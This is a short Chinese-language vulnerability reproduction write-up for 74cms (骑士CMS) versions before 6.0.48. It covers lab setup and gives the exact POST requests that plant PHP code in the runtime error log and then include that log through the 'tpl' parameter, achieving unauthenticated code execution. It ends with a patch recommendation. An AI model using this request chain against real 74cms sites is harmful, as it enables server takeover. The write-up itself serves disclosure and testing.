0x00简介
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。
0x01漏洞概述
骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,甚至会照成控制服务器等严重漏洞。
0x02影响版本
骑士 CMS < 6.0.48
0x03环境搭建
环境:windows2008R2+phpstudy
1.cms下载,在骑士cms官网下载6.0.20版本
下载链接:http://www.74cms.com/download/index.html
2.下载完成后解压放入WWW目录下安装
3.根据自己的配置,安装骑士cms
0x04漏洞复现
1.访问网站首页,在url处输入一下链接漏洞页面
index.php?m=home&a=assign_resume_tpl
2.使用post发送一下请求
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名=“info” 企业id="$_GET[‘id’]"/>
3.在骑士cms安装目录data\\Runtime\\Logs\\Home查看日志发现已经记录了错误信息
4.使用post发送以下请求包含日志,日志名称就是当天的年月日,直接包含即可
variable=1&tpl=data/Runtime/Logs/Home/当天年月日.log
0x05修复建议
1. 在骑士cms官网下载最新的补丁包
下载地址:http://www.74cms.com/download/index.html